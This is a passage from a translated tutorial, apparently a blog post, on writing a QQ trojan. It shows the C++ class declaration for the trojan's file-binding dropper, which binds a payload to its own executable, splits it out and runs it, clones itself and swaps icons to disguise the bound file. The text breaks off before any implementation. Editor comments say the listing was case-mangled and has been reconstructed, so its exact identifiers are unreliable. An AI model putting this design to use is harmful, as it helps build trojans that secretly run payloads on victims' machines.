Writing a QQ Trojan Yourself — File Binding
In this article I analyze the implementation of the CBindFile class in detail.
First, let's look at the declaration of the CBindFile class (the listing below was recovered from a case-mangled translation; identifier casing has been normalized, so confirm exact names against the original source):
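// CBindFile: the "file binder" (dropper) component of the trojan.
//
// From the declaration alone the class does two jobs, selected at run time by
// Initiate(): either append ("bind") a second file to its own executable, or
// — when it detects that it is already a bound file — split the payload back
// out ("unbind"), write the parts to disk and execute them.
//
// NOTE(review): the listing as published was case-mangled and did not compile
// (class name spelled three ways, missing ')' on EnumIconProc, space dropped
// in GetRunFileProcessInfo). Identifier casing below is a reconstruction;
// verify against the original source before relying on any exact name.
class CBindFile : public CObject
{
public:
    CBindFile();
    virtual ~CBindFile();

    // Marker indicating that this file has already been bound.
    static const char* const szFlag;
    // File size of the unbound original (without the dynamic-link library).
    static const unsigned int LENORIGIN;
    // File size after the DLL has been bound.
    // NOTE(review): fixed size constants like these suggest the payload is
    // located by absolute offset inside the file rather than by parsing the
    // PE; the implementation is not shown here, so confirm before assuming.
    static const unsigned int LENORIGINADDDLL;

private:
    TCHAR my_name[MAX_PATH];        // our own file name
    TCHAR szMyFilePath[MAX_PATH];   // our own file path
    HANDLE hFileMyself;             // handle to our own file
    // Buffer holding the file data read from disk.
    // NOTE(review): owning raw pointer plus raw HANDLE with no copy control
    // declared — confirm the class is non-copyable (or that the destructor is
    // the only release path) or a copy would double-free / double-close.
    BYTE* buf;
    CString strToBindFilePath;      // path of the file to be bound
    CString strFinalFilePath;       // path of the final combined file
    // Extension of the bound file: three characters plus terminator.
    // NOTE(review): any copy into this must be length-bounded; a four-or-more
    // character extension would overflow it.
    char m_ext[4];
    CString strUnbindFilePath_dll;  // name of the DLL split out on unbind
    CString strUnbindFilePath_sec;  // name of the second file split out on unbind
    PROCESS_INFORMATION piRunProc;  // process info of the launched second file

public:
    // Decides whether this run should bind or unbind.
    BOOL Initiate();
    // Clones the original file and runs the clone.
    BOOL CloneMyself_and_Run();
    // Returns the process information of the split-out file that was run.
    void GetRunFileProcessInfo(PROCESS_INFORMATION& pi) const;
    CString GetSecFilePath() const;

private:
    // Splits the combined file back into its parts and runs them.
    BOOL Unbind_and_Run();
    // Binds this executable together with another file.
    BOOL Bind_File();
    // Creates the process for a split-out file.
    BOOL Create_Process(const char* temp_run, BOOL bDirectRun);
    // True when szSpecFileName is the specific file name being checked for.
    BOOL IsSpecFileName(const TCHAR* const szSpecFileName) const;
    // Replaces all icons in our own file (see the icon section later).
    void Modify_MyIcon(BYTE*& buf);
    // Finds, in the PE being bound, the icon that matches our own file.
    BYTE* Find_Match_Icon(HMODULE hExeToBind, const RESDIR* pResDir);
    // Icon enumeration callback.
    static BOOL CALLBACK EnumIconProc(HMODULE hExe,
                                      LPCTSTR lpszType,
                                      LPTSTR lpszName,
                                      LPARAM lParam);
};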
The three icon-related functions are not covered here; they are explained in detail in the later section on icon handling. Let's go through the important member functions.
1. Initiate()